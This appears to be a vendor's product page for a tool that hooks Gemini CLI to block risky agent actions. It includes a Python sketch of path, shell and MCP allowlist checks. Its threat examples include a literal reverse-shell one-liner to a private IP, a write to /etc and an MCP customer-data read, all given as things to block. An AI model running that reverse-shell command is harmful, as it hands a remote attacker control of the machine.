Gemini CLI security

Put Gemini CLI inside your agent security perimeter.

Agent Keeper turns Gemini CLI hooks into enforceable controls for shell commands, file reads and writes, prompt submissions, web access, and MCP tool calls.

Runtime action stream

Gemini CLI (gemini)

1. Shell commands: BeforeTool / run_shell_command (Block or allow)
2. File writes: BeforeTool / write_file (Path policy)
3. File edits: BeforeTool / replace (Path policy)
4. File reads: BeforeTool / read_file (Audit or block)

Why teams buy it

Gemini CLI gets the same control plane as the rest of your agent fleet.

Use Gemini's synchronous hook points to validate tool arguments before execution.

Return deterministic blocks for dangerous writes, credential access, prompt injection, and risky commands.

Give platform teams one dashboard for Gemini CLI beside Codex, Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Carry host, machine, session, tool, verdict, and policy context into the Activity and Security views.

Coverage

Hooks become enforceable security controls.

Action            Signal                            Result
Shell commands    BeforeTool / run_shell_command    Block or allow
File writes       BeforeTool / write_file           Path policy
File edits        BeforeTool / replace              Path policy
File reads        BeforeTool / read_file            Audit or block
User prompts      BeforeAgent                       Detect injection
MCP tool calls    mcp__server__tool                 Skill policy

Threat coverage

Stop the agent behaviors attackers actually try.

Unsafe file writes

Prevent Gemini CLI from writing secrets, launch agents, deploy hooks, or system-level files.

write_file /etc/agentkeeper-e2e.conf

Reverse shells

Block commands that open outbound shells or turn development laptops into pivot points.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

MCP data leakage

Apply server and tool allowlists before Gemini invokes external MCP integrations.

mcp__drive__read_file customer-export.csv
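
As an added illustration (not Agent Keeper's code and not Gemini CLI's hook payload schema), the sketch below shows how a pre-execution check could reach a deterministic verdict for the three examples above. The policy values, the evaluate() helper, and the argument names "file_path" and "command" are assumptions.

```python
import posixpath
import re

# Constructed policy values for illustration; not Agent Keeper's real rules.
SYSTEM_PREFIXES = ("/etc/", "/usr/", "/Library/LaunchDaemons/")
SENSITIVE_PARTS = ("/.git/hooks/", "/LaunchAgents/")
MCP_ALLOWLIST = {"docs": {"search"}}  # server -> tools permitted
NET_REDIRECT = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")

def check_path(path):
    if not path:
        return "block", "missing path argument"
    # Normalize first so "/tmp/../etc/x" cannot slip past a prefix match.
    norm = posixpath.normpath(path)
    if norm.startswith(SYSTEM_PREFIXES):
        return "block", "system path: " + norm
    if any(part in "/" + norm for part in SENSITIVE_PARTS):
        return "block", "sensitive path: " + norm
    return "allow", "path ok"

def check_shell(command):
    # bash treats /dev/tcp/<host>/<port> in a redirection as a socket.
    if NET_REDIRECT.search(command):
        return "block", "shell I/O redirected to a network socket"
    return "allow", "command ok"

def check_mcp(tool_name):
    # Naming scheme shown on the page: mcp__<server>__<tool>
    parts = tool_name.split("__", 2)
    if len(parts) != 3 or not all(parts):
        return "block", "malformed MCP tool name"
    if parts[2] in MCP_ALLOWLIST.get(parts[1], ()):
        return "allow", "allowlisted MCP tool"
    return "block", "MCP tool not allowlisted: %s/%s" % (parts[1], parts[2])

def evaluate(tool_name, args):
    if tool_name in ("write_file", "replace"):
        return check_path(args.get("file_path"))  # arg names are assumptions
    if tool_name == "run_shell_command":
        return check_shell(args.get("command", ""))
    if tool_name.startswith("mcp__"):
        return check_mcp(tool_name)
    return "allow", "no policy for this tool"

SAMPLE_EVENTS = [  # constructed from the page's three threat examples
    ("write_file", {"file_path": "/etc/agentkeeper-e2e.conf"}),
    ("run_shell_command", {"command": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"}),
    ("mcp__drive__read_file", {"path": "customer-export.csv"}),
]
```

posixpath.normpath collapses ".." segments but does not resolve symlinks or anchor relative paths to the working directory, so a production path policy would resolve against the session workspace before matching.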

Install

One command, source-attributed events.

The installer writes the hook config, routes decisions through Runtime Shield, and labels events as gemini so security teams can filter by agent.

terminal
bash <(curl -fsSL "$AGENTKEEPER_API_URL/install-hooks.sh") --ide gemini

Uses the same org policies as Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Fails open on local outages while preserving API-backed audit history.

Feeds the Activity, Security, and Workstations views immediately after the first event.